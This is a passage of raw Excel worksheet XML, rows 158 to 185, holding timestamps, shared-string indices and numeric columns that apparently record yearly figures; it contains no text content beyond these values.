        <v>810</v>
      </c>
      <c r="T158">
        <v>724</v>
      </c>
      <c r="U158">
        <v>720</v>
      </c>
      <c r="V158">
        <v>3027</v>
      </c>
      <c r="W158" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="159" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A159" t="s">
        <v>4</v>
      </c>
      <c r="B159">
        <v>44431.622155011573</v>
      </c>
      <c r="C159" t="s">
        <v>1574</v>
      </c>
      <c r="D159">
        <v>131</v>
      </c>
      <c r="E159" t="s">
        <v>1575</v>
      </c>
      <c r="F159">
        <v>132</v>
      </c>
      <c r="G159" t="s">
        <v>1576</v>
      </c>
      <c r="H159" t="s">
        <v>1577</v>
      </c>
      <c r="I159" t="s">
        <v>75</v>
      </c>
      <c r="J159" t="s">
        <v>76</v>
      </c>
      <c r="K159" t="s">
        <v>15</v>
      </c>
      <c r="L159" t="s">
        <v>77</v>
      </c>
      <c r="M159" t="s">
        <v>90</v>
      </c>
      <c r="N159" t="s">
        <v>91</v>
      </c>
      <c r="O159" t="s">
        <v>1578</v>
      </c>
      <c r="Q159" t="s">
        <v>3550</v>
      </c>
      <c r="R159">
        <v>2987</v>
      </c>
      <c r="S159">
        <v>2788</v>
      </c>
      <c r="T159">
        <v>2427</v>
      </c>
      <c r="U159">
        <v>2126</v>
      </c>
      <c r="V159">
        <v>2389</v>
      </c>
      <c r="W159" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="160" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A160" t="s">
        <v>4</v>
      </c>
      <c r="B160">
        <v>44379.637047951386</v>
      </c>
      <c r="C160" t="s">
        <v>1590</v>
      </c>
      <c r="D160">
        <v>100</v>
      </c>
      <c r="E160" t="s">
        <v>1591</v>
      </c>
      <c r="F160">
        <v>100</v>
      </c>
      <c r="G160" t="s">
        <v>1592</v>
      </c>
      <c r="H160" t="s">
        <v>1593</v>
      </c>
      <c r="I160" t="s">
        <v>196</v>
      </c>
      <c r="J160" t="s">
        <v>197</v>
      </c>
      <c r="K160" t="s">
        <v>18</v>
      </c>
      <c r="L160" t="s">
        <v>77</v>
      </c>
      <c r="M160" t="s">
        <v>18</v>
      </c>
      <c r="N160" t="s">
        <v>198</v>
      </c>
      <c r="Q160" t="s">
        <v>1406</v>
      </c>
      <c r="R160">
        <v>2983</v>
      </c>
      <c r="S160">
        <v>2789</v>
      </c>
      <c r="T160">
        <v>2430</v>
      </c>
      <c r="U160">
        <v>2124</v>
      </c>
      <c r="V160">
        <v>2633</v>
      </c>
      <c r="W160" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="161" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A161" t="s">
        <v>4</v>
      </c>
      <c r="B161">
        <v>44433.736928368053</v>
      </c>
      <c r="C161" t="s">
        <v>1599</v>
      </c>
      <c r="D161">
        <v>111</v>
      </c>
      <c r="E161" t="s">
        <v>1600</v>
      </c>
      <c r="F161">
        <v>100</v>
      </c>
      <c r="G161" t="s">
        <v>1601</v>
      </c>
      <c r="H161" t="s">
        <v>1602</v>
      </c>
      <c r="I161" t="s">
        <v>31</v>
      </c>
      <c r="J161" t="s">
        <v>262</v>
      </c>
      <c r="K161" t="s">
        <v>31</v>
      </c>
      <c r="L161" t="s">
        <v>77</v>
      </c>
      <c r="M161" t="s">
        <v>262</v>
      </c>
      <c r="N161" t="s">
        <v>263</v>
      </c>
      <c r="Q161" t="s">
        <v>3551</v>
      </c>
      <c r="R161">
        <v>47853</v>
      </c>
      <c r="S161">
        <v>18156</v>
      </c>
      <c r="T161">
        <v>21457</v>
      </c>
      <c r="U161">
        <v>26856</v>
      </c>
      <c r="V161">
        <v>30200</v>
      </c>
      <c r="W161" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="162" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A162" t="s">
        <v>4</v>
      </c>
      <c r="B162">
        <v>44519.632626631945</v>
      </c>
      <c r="C162" t="s">
        <v>1599</v>
      </c>
      <c r="D162">
        <v>201</v>
      </c>
      <c r="E162" t="s">
        <v>1600</v>
      </c>
      <c r="F162">
        <v>200</v>
      </c>
      <c r="G162" t="s">
        <v>1601</v>
      </c>
      <c r="H162" t="s">
        <v>1602</v>
      </c>
      <c r="I162" t="s">
        <v>31</v>
      </c>
      <c r="J162" t="s">
        <v>262</v>
      </c>
      <c r="K162" t="s">
        <v>31</v>
      </c>
      <c r="L162" t="s">
        <v>77</v>
      </c>
      <c r="M162" t="s">
        <v>262</v>
      </c>
      <c r="N162" t="s">
        <v>263</v>
      </c>
      <c r="Q162" t="s">
        <v>3552</v>
      </c>
      <c r="R162">
        <v>47853</v>
      </c>
      <c r="S162">
        <v>18156</v>
      </c>
      <c r="T162">
        <v>21457</v>
      </c>
      <c r="U162">
        <v>26856</v>
      </c>
      <c r="V162">
        <v>30200</v>
      </c>
      <c r="W162" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="163" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A163" t="s">
        <v>4</v>
      </c>
      <c r="B163">
        <v>44130.302816875002</v>
      </c>
      <c r="C163" t="s">
        <v>1611</v>
      </c>
      <c r="D163">
        <v>100</v>
      </c>
      <c r="E163" t="s">
        <v>1612</v>
      </c>
      <c r="F163">
        <v>100</v>
      </c>
      <c r="G163" t="s">
        <v>1613</v>
      </c>
      <c r="H163" t="s">
        <v>1614</v>
      </c>
      <c r="I163" t="s">
        <v>196</v>
      </c>
      <c r="J163" t="s">
        <v>197</v>
      </c>
      <c r="K163" t="s">
        <v>18</v>
      </c>
      <c r="L163" t="s">
        <v>77</v>
      </c>
      <c r="M163" t="s">
        <v>18</v>
      </c>
      <c r="N163" t="s">
        <v>198</v>
      </c>
      <c r="Q163" t="s">
        <v>3553</v>
      </c>
      <c r="R163">
        <v>225</v>
      </c>
      <c r="S163">
        <v>1468</v>
      </c>
      <c r="T163">
        <v>283</v>
      </c>
      <c r="U163">
        <v>268</v>
      </c>
      <c r="V163">
        <v>268</v>
      </c>
      <c r="W163" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="164" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A164" t="s">
        <v>4</v>
      </c>
      <c r="B164">
        <v>44130.302816863426</v>
      </c>
      <c r="C164" t="s">
        <v>1611</v>
      </c>
      <c r="D164">
        <v>100</v>
      </c>
      <c r="E164" t="s">
        <v>1616</v>
      </c>
      <c r="F164">
        <v>100</v>
      </c>
      <c r="G164" t="s">
        <v>1617</v>
      </c>
      <c r="H164" t="s">
        <v>1618</v>
      </c>
      <c r="I164" t="s">
        <v>196</v>
      </c>
      <c r="J164" t="s">
        <v>197</v>
      </c>
      <c r="K164" t="s">
        <v>18</v>
      </c>
      <c r="L164" t="s">
        <v>77</v>
      </c>
      <c r="M164" t="s">
        <v>18</v>
      </c>
      <c r="N164" t="s">
        <v>198</v>
      </c>
      <c r="Q164" t="s">
        <v>3553</v>
      </c>
      <c r="U164">
        <v>6</v>
      </c>
      <c r="V164">
        <v>2</v>
      </c>
      <c r="W164" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="165" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A165" t="s">
        <v>4</v>
      </c>
      <c r="B165">
        <v>43977.754807789352</v>
      </c>
      <c r="C165" t="s">
        <v>1619</v>
      </c>
      <c r="D165">
        <v>120</v>
      </c>
      <c r="E165" t="s">
        <v>1620</v>
      </c>
      <c r="F165">
        <v>101</v>
      </c>
      <c r="G165" t="s">
        <v>1621</v>
      </c>
      <c r="H165" t="s">
        <v>1622</v>
      </c>
      <c r="I165" t="s">
        <v>196</v>
      </c>
      <c r="J165" t="s">
        <v>197</v>
      </c>
      <c r="K165" t="s">
        <v>18</v>
      </c>
      <c r="L165" t="s">
        <v>77</v>
      </c>
      <c r="M165" t="s">
        <v>18</v>
      </c>
      <c r="N165" t="s">
        <v>198</v>
      </c>
      <c r="O165" t="s">
        <v>1623</v>
      </c>
      <c r="P165" t="s">
        <v>242</v>
      </c>
      <c r="Q165" t="s">
        <v>3554</v>
      </c>
      <c r="R165">
        <v>47</v>
      </c>
      <c r="S165">
        <v>13</v>
      </c>
      <c r="T165">
        <v>152</v>
      </c>
      <c r="U165">
        <v>95</v>
      </c>
      <c r="V165">
        <v>181</v>
      </c>
      <c r="W165" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="166" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A166" t="s">
        <v>4</v>
      </c>
      <c r="B166">
        <v>44357.832009259262</v>
      </c>
      <c r="C166" t="s">
        <v>1619</v>
      </c>
      <c r="D166">
        <v>120</v>
      </c>
      <c r="E166" t="s">
        <v>1625</v>
      </c>
      <c r="F166">
        <v>100</v>
      </c>
      <c r="G166" t="s">
        <v>1626</v>
      </c>
      <c r="H166" t="s">
        <v>1627</v>
      </c>
      <c r="I166" t="s">
        <v>196</v>
      </c>
      <c r="J166" t="s">
        <v>197</v>
      </c>
      <c r="K166" t="s">
        <v>18</v>
      </c>
      <c r="L166" t="s">
        <v>77</v>
      </c>
      <c r="M166" t="s">
        <v>18</v>
      </c>
      <c r="N166" t="s">
        <v>198</v>
      </c>
      <c r="O166" t="s">
        <v>1628</v>
      </c>
      <c r="Q166" t="s">
        <v>3554</v>
      </c>
      <c r="W166" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="167" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A167" t="s">
        <v>4</v>
      </c>
      <c r="B167">
        <v>44363.663383263891</v>
      </c>
      <c r="C167" t="s">
        <v>1629</v>
      </c>
      <c r="D167">
        <v>100</v>
      </c>
      <c r="E167" t="s">
        <v>1630</v>
      </c>
      <c r="F167">
        <v>100</v>
      </c>
      <c r="G167" t="s">
        <v>1631</v>
      </c>
      <c r="H167" t="s">
        <v>1632</v>
      </c>
      <c r="I167" t="s">
        <v>196</v>
      </c>
      <c r="J167" t="s">
        <v>197</v>
      </c>
      <c r="K167" t="s">
        <v>18</v>
      </c>
      <c r="L167" t="s">
        <v>77</v>
      </c>
      <c r="M167" t="s">
        <v>18</v>
      </c>
      <c r="N167" t="s">
        <v>198</v>
      </c>
      <c r="Q167" t="s">
        <v>1633</v>
      </c>
      <c r="W167" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="168" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A168" t="s">
        <v>4</v>
      </c>
      <c r="B168">
        <v>44363.663383298612</v>
      </c>
      <c r="C168" t="s">
        <v>1629</v>
      </c>
      <c r="D168">
        <v>100</v>
      </c>
      <c r="E168" t="s">
        <v>1634</v>
      </c>
      <c r="F168">
        <v>100</v>
      </c>
      <c r="G168" t="s">
        <v>1635</v>
      </c>
      <c r="H168" t="s">
        <v>1636</v>
      </c>
      <c r="I168" t="s">
        <v>196</v>
      </c>
      <c r="J168" t="s">
        <v>197</v>
      </c>
      <c r="K168" t="s">
        <v>18</v>
      </c>
      <c r="L168" t="s">
        <v>77</v>
      </c>
      <c r="M168" t="s">
        <v>18</v>
      </c>
      <c r="N168" t="s">
        <v>198</v>
      </c>
      <c r="Q168" t="s">
        <v>1633</v>
      </c>
      <c r="R168">
        <v>7929</v>
      </c>
      <c r="S168">
        <v>5966</v>
      </c>
      <c r="T168">
        <v>6409</v>
      </c>
      <c r="U168">
        <v>8838</v>
      </c>
      <c r="V168">
        <v>7497</v>
      </c>
      <c r="W168" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="169" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A169" t="s">
        <v>4</v>
      </c>
      <c r="B169">
        <v>44540.730685659721</v>
      </c>
      <c r="C169" t="s">
        <v>1641</v>
      </c>
      <c r="D169">
        <v>100</v>
      </c>
      <c r="E169" t="s">
        <v>1642</v>
      </c>
      <c r="F169">
        <v>100</v>
      </c>
      <c r="G169" t="s">
        <v>1643</v>
      </c>
      <c r="H169" t="s">
        <v>1644</v>
      </c>
      <c r="I169" t="s">
        <v>196</v>
      </c>
      <c r="J169" t="s">
        <v>197</v>
      </c>
      <c r="K169" t="s">
        <v>18</v>
      </c>
      <c r="L169" t="s">
        <v>77</v>
      </c>
      <c r="M169" t="s">
        <v>18</v>
      </c>
      <c r="N169" t="s">
        <v>198</v>
      </c>
      <c r="O169" t="s">
        <v>1645</v>
      </c>
      <c r="Q169" t="s">
        <v>161</v>
      </c>
      <c r="W169" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="170" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A170" t="s">
        <v>4</v>
      </c>
      <c r="B170">
        <v>44525.49595715278</v>
      </c>
      <c r="C170" t="s">
        <v>1646</v>
      </c>
      <c r="D170">
        <v>100</v>
      </c>
      <c r="E170" t="s">
        <v>1647</v>
      </c>
      <c r="F170">
        <v>100</v>
      </c>
      <c r="G170" t="s">
        <v>1648</v>
      </c>
      <c r="H170" t="s">
        <v>1649</v>
      </c>
      <c r="I170" t="s">
        <v>31</v>
      </c>
      <c r="J170" t="s">
        <v>262</v>
      </c>
      <c r="K170" t="s">
        <v>31</v>
      </c>
      <c r="L170" t="s">
        <v>77</v>
      </c>
      <c r="M170" t="s">
        <v>262</v>
      </c>
      <c r="N170" t="s">
        <v>263</v>
      </c>
      <c r="Q170" t="s">
        <v>3555</v>
      </c>
      <c r="R170">
        <v>91</v>
      </c>
      <c r="S170">
        <v>616</v>
      </c>
      <c r="T170">
        <v>3762</v>
      </c>
      <c r="U170">
        <v>3408</v>
      </c>
      <c r="V170">
        <v>5432</v>
      </c>
      <c r="W170" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="171" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A171" t="s">
        <v>4</v>
      </c>
      <c r="B171">
        <v>44649.69528</v>
      </c>
      <c r="C171" t="s">
        <v>1647</v>
      </c>
      <c r="D171">
        <v>102</v>
      </c>
      <c r="E171" t="s">
        <v>1651</v>
      </c>
      <c r="F171">
        <v>102</v>
      </c>
      <c r="G171" t="s">
        <v>1652</v>
      </c>
      <c r="H171" t="s">
        <v>1653</v>
      </c>
      <c r="I171" t="s">
        <v>196</v>
      </c>
      <c r="J171" t="s">
        <v>197</v>
      </c>
      <c r="K171" t="s">
        <v>18</v>
      </c>
      <c r="L171" t="s">
        <v>77</v>
      </c>
      <c r="M171" t="s">
        <v>18</v>
      </c>
      <c r="N171" t="s">
        <v>198</v>
      </c>
      <c r="Q171" t="s">
        <v>3556</v>
      </c>
      <c r="W171" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="172" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A172" t="s">
        <v>4</v>
      </c>
      <c r="B172">
        <v>44326.923011990744</v>
      </c>
      <c r="C172" t="s">
        <v>1657</v>
      </c>
      <c r="D172">
        <v>102</v>
      </c>
      <c r="E172" t="s">
        <v>1658</v>
      </c>
      <c r="F172">
        <v>102</v>
      </c>
      <c r="G172" t="s">
        <v>1659</v>
      </c>
      <c r="H172" t="s">
        <v>1660</v>
      </c>
      <c r="I172" t="s">
        <v>185</v>
      </c>
      <c r="J172" t="s">
        <v>186</v>
      </c>
      <c r="K172" t="s">
        <v>16</v>
      </c>
      <c r="L172" t="s">
        <v>83</v>
      </c>
      <c r="M172" t="s">
        <v>72</v>
      </c>
      <c r="O172" t="s">
        <v>1661</v>
      </c>
      <c r="Q172" t="s">
        <v>3557</v>
      </c>
      <c r="R172">
        <v>20110</v>
      </c>
      <c r="S172">
        <v>19820</v>
      </c>
      <c r="T172">
        <v>25748</v>
      </c>
      <c r="U172">
        <v>34210</v>
      </c>
      <c r="V172">
        <v>33832</v>
      </c>
      <c r="W172" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="173" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A173" t="s">
        <v>4</v>
      </c>
      <c r="B173">
        <v>44320.663404872685</v>
      </c>
      <c r="C173" t="s">
        <v>1674</v>
      </c>
      <c r="D173">
        <v>103</v>
      </c>
      <c r="E173" t="s">
        <v>1675</v>
      </c>
      <c r="F173">
        <v>103</v>
      </c>
      <c r="G173" t="s">
        <v>1676</v>
      </c>
      <c r="H173" t="s">
        <v>1677</v>
      </c>
      <c r="I173" t="s">
        <v>179</v>
      </c>
      <c r="J173" t="s">
        <v>180</v>
      </c>
      <c r="K173" t="s">
        <v>575</v>
      </c>
      <c r="L173" t="s">
        <v>77</v>
      </c>
      <c r="M173" t="s">
        <v>1066</v>
      </c>
      <c r="Q173" t="s">
        <v>3558</v>
      </c>
      <c r="R173">
        <v>3003</v>
      </c>
      <c r="S173">
        <v>2792</v>
      </c>
      <c r="T173">
        <v>2449</v>
      </c>
      <c r="U173">
        <v>2130</v>
      </c>
      <c r="V173">
        <v>2621</v>
      </c>
      <c r="W173" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="174" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A174" t="s">
        <v>4</v>
      </c>
      <c r="B174">
        <v>44320.612678124999</v>
      </c>
      <c r="C174" t="s">
        <v>633</v>
      </c>
      <c r="D174">
        <v>100</v>
      </c>
      <c r="E174" t="s">
        <v>1717</v>
      </c>
      <c r="F174">
        <v>100</v>
      </c>
      <c r="G174" t="s">
        <v>1718</v>
      </c>
      <c r="H174" t="s">
        <v>1719</v>
      </c>
      <c r="I174" t="s">
        <v>179</v>
      </c>
      <c r="J174" t="s">
        <v>633</v>
      </c>
      <c r="K174" t="s">
        <v>21</v>
      </c>
      <c r="L174" t="s">
        <v>77</v>
      </c>
      <c r="M174" t="s">
        <v>633</v>
      </c>
      <c r="N174" t="s">
        <v>634</v>
      </c>
      <c r="Q174" t="s">
        <v>3559</v>
      </c>
      <c r="R174">
        <v>30249</v>
      </c>
      <c r="S174">
        <v>27627</v>
      </c>
      <c r="T174">
        <v>25490</v>
      </c>
      <c r="U174">
        <v>26293</v>
      </c>
      <c r="V174">
        <v>27255</v>
      </c>
      <c r="W174" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="175" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A175" t="s">
        <v>4</v>
      </c>
      <c r="B175">
        <v>44783.685339317133</v>
      </c>
      <c r="C175" t="s">
        <v>1721</v>
      </c>
      <c r="D175">
        <v>100</v>
      </c>
      <c r="E175" t="s">
        <v>1722</v>
      </c>
      <c r="F175">
        <v>100</v>
      </c>
      <c r="G175" t="s">
        <v>1723</v>
      </c>
      <c r="H175" t="s">
        <v>1724</v>
      </c>
      <c r="I175" t="s">
        <v>82</v>
      </c>
      <c r="J175" t="s">
        <v>744</v>
      </c>
      <c r="K175" t="s">
        <v>24</v>
      </c>
      <c r="L175" t="s">
        <v>83</v>
      </c>
      <c r="M175" t="s">
        <v>72</v>
      </c>
      <c r="Q175" t="s">
        <v>3560</v>
      </c>
      <c r="W175" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="176" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A176" t="s">
        <v>4</v>
      </c>
      <c r="B176">
        <v>44783.73468765046</v>
      </c>
      <c r="C176" t="s">
        <v>1726</v>
      </c>
      <c r="D176">
        <v>100</v>
      </c>
      <c r="E176" t="s">
        <v>1727</v>
      </c>
      <c r="F176">
        <v>100</v>
      </c>
      <c r="G176" t="s">
        <v>1728</v>
      </c>
      <c r="H176" t="s">
        <v>1729</v>
      </c>
      <c r="I176" t="s">
        <v>82</v>
      </c>
      <c r="J176" t="s">
        <v>744</v>
      </c>
      <c r="K176" t="s">
        <v>24</v>
      </c>
      <c r="L176" t="s">
        <v>83</v>
      </c>
      <c r="M176" t="s">
        <v>72</v>
      </c>
      <c r="Q176" t="s">
        <v>3561</v>
      </c>
      <c r="W176" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="177" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A177" t="s">
        <v>4</v>
      </c>
      <c r="B177">
        <v>44292.098849594906</v>
      </c>
      <c r="C177" t="s">
        <v>1733</v>
      </c>
      <c r="D177">
        <v>105</v>
      </c>
      <c r="E177" t="s">
        <v>1734</v>
      </c>
      <c r="F177">
        <v>105</v>
      </c>
      <c r="G177" t="s">
        <v>1735</v>
      </c>
      <c r="H177" t="s">
        <v>1736</v>
      </c>
      <c r="I177" t="s">
        <v>31</v>
      </c>
      <c r="J177" t="s">
        <v>262</v>
      </c>
      <c r="K177" t="s">
        <v>31</v>
      </c>
      <c r="L177" t="s">
        <v>77</v>
      </c>
      <c r="M177" t="s">
        <v>262</v>
      </c>
      <c r="N177" t="s">
        <v>263</v>
      </c>
      <c r="Q177" t="s">
        <v>3562</v>
      </c>
      <c r="R177">
        <v>21273</v>
      </c>
      <c r="S177">
        <v>20936</v>
      </c>
      <c r="T177">
        <v>16902</v>
      </c>
      <c r="U177">
        <v>17884</v>
      </c>
      <c r="V177">
        <v>22457</v>
      </c>
      <c r="W177" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="178" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A178" t="s">
        <v>4</v>
      </c>
      <c r="B178">
        <v>44369.44911671296</v>
      </c>
      <c r="C178" t="s">
        <v>1739</v>
      </c>
      <c r="D178">
        <v>202</v>
      </c>
      <c r="E178" t="s">
        <v>1745</v>
      </c>
      <c r="F178">
        <v>101</v>
      </c>
      <c r="G178" t="s">
        <v>1746</v>
      </c>
      <c r="H178" t="s">
        <v>1747</v>
      </c>
      <c r="I178" t="s">
        <v>75</v>
      </c>
      <c r="J178" t="s">
        <v>76</v>
      </c>
      <c r="K178" t="s">
        <v>15</v>
      </c>
      <c r="L178" t="s">
        <v>77</v>
      </c>
      <c r="M178" t="s">
        <v>90</v>
      </c>
      <c r="N178" t="s">
        <v>167</v>
      </c>
      <c r="O178" t="s">
        <v>1748</v>
      </c>
      <c r="Q178" t="s">
        <v>3563</v>
      </c>
      <c r="U178">
        <v>1</v>
      </c>
      <c r="V178">
        <v>2188</v>
      </c>
      <c r="W178" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="179" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A179" t="s">
        <v>4</v>
      </c>
      <c r="B179">
        <v>44369.449116643518</v>
      </c>
      <c r="C179" t="s">
        <v>1739</v>
      </c>
      <c r="D179">
        <v>202</v>
      </c>
      <c r="E179" t="s">
        <v>1750</v>
      </c>
      <c r="F179">
        <v>121</v>
      </c>
      <c r="G179" t="s">
        <v>1751</v>
      </c>
      <c r="H179" t="s">
        <v>1752</v>
      </c>
      <c r="I179" t="s">
        <v>75</v>
      </c>
      <c r="J179" t="s">
        <v>76</v>
      </c>
      <c r="K179" t="s">
        <v>15</v>
      </c>
      <c r="L179" t="s">
        <v>77</v>
      </c>
      <c r="M179" t="s">
        <v>90</v>
      </c>
      <c r="N179" t="s">
        <v>167</v>
      </c>
      <c r="O179" t="s">
        <v>1753</v>
      </c>
      <c r="Q179" t="s">
        <v>3563</v>
      </c>
      <c r="R179">
        <v>146809</v>
      </c>
      <c r="S179">
        <v>167648</v>
      </c>
      <c r="T179">
        <v>151453</v>
      </c>
      <c r="U179">
        <v>166315</v>
      </c>
      <c r="V179">
        <v>247824</v>
      </c>
      <c r="W179" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="180" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A180" t="s">
        <v>4</v>
      </c>
      <c r="B180">
        <v>44369.449116689815</v>
      </c>
      <c r="C180" t="s">
        <v>1739</v>
      </c>
      <c r="D180">
        <v>202</v>
      </c>
      <c r="E180" t="s">
        <v>1754</v>
      </c>
      <c r="F180">
        <v>122</v>
      </c>
      <c r="G180" t="s">
        <v>1755</v>
      </c>
      <c r="H180" t="s">
        <v>1756</v>
      </c>
      <c r="I180" t="s">
        <v>75</v>
      </c>
      <c r="J180" t="s">
        <v>76</v>
      </c>
      <c r="K180" t="s">
        <v>15</v>
      </c>
      <c r="L180" t="s">
        <v>77</v>
      </c>
      <c r="M180" t="s">
        <v>90</v>
      </c>
      <c r="N180" t="s">
        <v>167</v>
      </c>
      <c r="O180" t="s">
        <v>1757</v>
      </c>
      <c r="Q180" t="s">
        <v>3563</v>
      </c>
      <c r="R180">
        <v>131801</v>
      </c>
      <c r="S180">
        <v>139572</v>
      </c>
      <c r="T180">
        <v>239616</v>
      </c>
      <c r="U180">
        <v>708788</v>
      </c>
      <c r="V180">
        <v>727682</v>
      </c>
      <c r="W180" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="181" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A181" t="s">
        <v>4</v>
      </c>
      <c r="B181">
        <v>44439.444533761576</v>
      </c>
      <c r="C181" t="s">
        <v>1758</v>
      </c>
      <c r="D181">
        <v>101</v>
      </c>
      <c r="E181" t="s">
        <v>1759</v>
      </c>
      <c r="F181">
        <v>101</v>
      </c>
      <c r="G181" t="s">
        <v>1760</v>
      </c>
      <c r="H181" t="s">
        <v>1761</v>
      </c>
      <c r="I181" t="s">
        <v>156</v>
      </c>
      <c r="J181" t="s">
        <v>301</v>
      </c>
      <c r="K181" t="s">
        <v>26</v>
      </c>
      <c r="L181" t="s">
        <v>77</v>
      </c>
      <c r="M181" t="s">
        <v>475</v>
      </c>
      <c r="N181" t="s">
        <v>476</v>
      </c>
      <c r="Q181" t="s">
        <v>161</v>
      </c>
      <c r="R181">
        <v>2935</v>
      </c>
      <c r="W181" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="182" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A182" t="s">
        <v>4</v>
      </c>
      <c r="B182">
        <v>44677.641968946758</v>
      </c>
      <c r="C182" t="s">
        <v>1762</v>
      </c>
      <c r="D182">
        <v>100</v>
      </c>
      <c r="E182" t="s">
        <v>1763</v>
      </c>
      <c r="F182">
        <v>100</v>
      </c>
      <c r="G182" t="s">
        <v>1764</v>
      </c>
      <c r="H182" t="s">
        <v>1765</v>
      </c>
      <c r="I182" t="s">
        <v>268</v>
      </c>
      <c r="J182" t="s">
        <v>566</v>
      </c>
      <c r="K182" t="s">
        <v>10</v>
      </c>
      <c r="L182" t="s">
        <v>77</v>
      </c>
      <c r="M182" t="s">
        <v>1766</v>
      </c>
      <c r="N182" t="s">
        <v>1767</v>
      </c>
      <c r="Q182" t="s">
        <v>3564</v>
      </c>
      <c r="T182">
        <v>12</v>
      </c>
      <c r="W182" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="183" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A183" t="s">
        <v>4</v>
      </c>
      <c r="B183">
        <v>44434.519642870371</v>
      </c>
      <c r="C183" t="s">
        <v>1769</v>
      </c>
      <c r="D183">
        <v>150</v>
      </c>
      <c r="E183" t="s">
        <v>1770</v>
      </c>
      <c r="F183">
        <v>200</v>
      </c>
      <c r="G183" t="s">
        <v>1771</v>
      </c>
      <c r="H183" t="s">
        <v>1772</v>
      </c>
      <c r="I183" t="s">
        <v>82</v>
      </c>
      <c r="J183" t="s">
        <v>744</v>
      </c>
      <c r="K183" t="s">
        <v>24</v>
      </c>
      <c r="L183" t="s">
        <v>83</v>
      </c>
      <c r="M183" t="s">
        <v>72</v>
      </c>
      <c r="O183" t="s">
        <v>1773</v>
      </c>
      <c r="Q183" t="s">
        <v>3565</v>
      </c>
      <c r="S183">
        <v>11149</v>
      </c>
      <c r="T183">
        <v>3530</v>
      </c>
      <c r="U183">
        <v>6367</v>
      </c>
      <c r="V183">
        <v>27550</v>
      </c>
      <c r="W183" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="184" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A184" t="s">
        <v>4</v>
      </c>
      <c r="B184">
        <v>44495.004373414355</v>
      </c>
      <c r="C184" t="s">
        <v>1769</v>
      </c>
      <c r="D184">
        <v>150</v>
      </c>
      <c r="E184" t="s">
        <v>1775</v>
      </c>
      <c r="F184">
        <v>200</v>
      </c>
      <c r="G184" t="s">
        <v>1776</v>
      </c>
      <c r="H184" t="s">
        <v>1780</v>
      </c>
      <c r="I184" t="s">
        <v>82</v>
      </c>
      <c r="J184" t="s">
        <v>744</v>
      </c>
      <c r="K184" t="s">
        <v>24</v>
      </c>
      <c r="L184" t="s">
        <v>83</v>
      </c>
      <c r="M184" t="s">
        <v>72</v>
      </c>
      <c r="O184" t="s">
        <v>1773</v>
      </c>
      <c r="Q184" t="s">
        <v>3565</v>
      </c>
      <c r="R184">
        <v>16</v>
      </c>
      <c r="S184">
        <v>157</v>
      </c>
      <c r="T184">
        <v>114582</v>
      </c>
      <c r="U184">
        <v>567210</v>
      </c>
      <c r="V184">
        <v>539779</v>
      </c>
      <c r="W184" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="185" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A185" t="s">
        <v>4</v>
      </c>
      <c r="B185">
        <v>44434.519642858795</v>
      </c>
      <c r="C185" t="s">
        <v>1769</v>
      </c>
      <c r="D185">
        <v>150</v>
      </c>
      <c r="E185" t="s">
        <v>1781</v>
      </c>
      <c r="F185">
        <v>111</v>
      </c>
      <c r="G185" t="s">
        <v>1782</v>
      </c>
      <c r="H185" t="s">
        <v>1783</v>
      </c>
      <c r="I185" t="s">
        <v>82</v>
      </c>
      <c r="J185" t="s">
        <v>744</v>
      </c>
      <c r="K185" t="s">
        <v>24</v>
      </c>
      <c r="L185" t="s">
        <v>83</v>
      </c>
      <c r="M185" t="s">
        <v>72</v>
      </c>
      <c r="Q185" t="s">
        <v>3565</v>
      </c>
      <c r="R185">
        <v>1518</v>
      </c>
      <c r="S185">
        <v>1042</v>
      </c>
      <c r="T185">
        <v>827</v>
      </c>
      <c r="U185">
        <v>1561</v>
      </c>
      <c r="V185">
        <v>1116</v>
      </c>
      <c r="W185" t="s">
        <v>95</v>
      </c>
    </row>
